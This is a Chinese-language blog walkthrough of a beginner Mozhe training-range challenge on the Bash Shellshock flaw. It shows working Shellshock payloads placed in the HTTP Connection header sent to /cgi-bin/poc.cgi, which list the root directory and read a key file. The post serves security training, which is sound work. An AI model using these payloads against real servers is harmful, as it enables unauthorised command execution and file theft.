欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

墨者靶场 初级:Bash漏洞分析溯源

程序员文章站 2022-03-24 23:53:04
...

墨者靶场 初级:Bash漏洞分析溯源

题目

墨者靶场 初级:Bash漏洞分析溯源

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。

实训目标

1、了解bash;
2、了解Bash远程命令执行漏洞形成原因;
3、了解Bash远程命令执行漏洞利用方法;

解题方向

找到poc.cgi文件

解题步骤

启动靶场,打开链接访问,是一个显示页面。
墨者靶场 初级:Bash漏洞分析溯源
Bash漏洞存在的路径多数在网页/cgi-bin/下,打开此网页。

http://url/cgi-bin/poc.cgi

墨者靶场 初级:Bash漏洞分析溯源
此漏洞是存在的,使用burp suite抓包。
墨者靶场 初级:Bash漏洞分析溯源
把在下面的Connection的参数,改成我们的执行代码。

Connection: () { :;}; echo; /bin/ls /

墨者靶场 初级:Bash漏洞分析溯源
发送,发现key.txt文件,同上查看该文件。

Connection: () { :;}; echo; /bin/cat /key.txt

墨者靶场 初级:Bash漏洞分析溯源
获得key值,提交即可。
墨者靶场 初级:Bash漏洞分析溯源

相关标签: 墨者靶场实战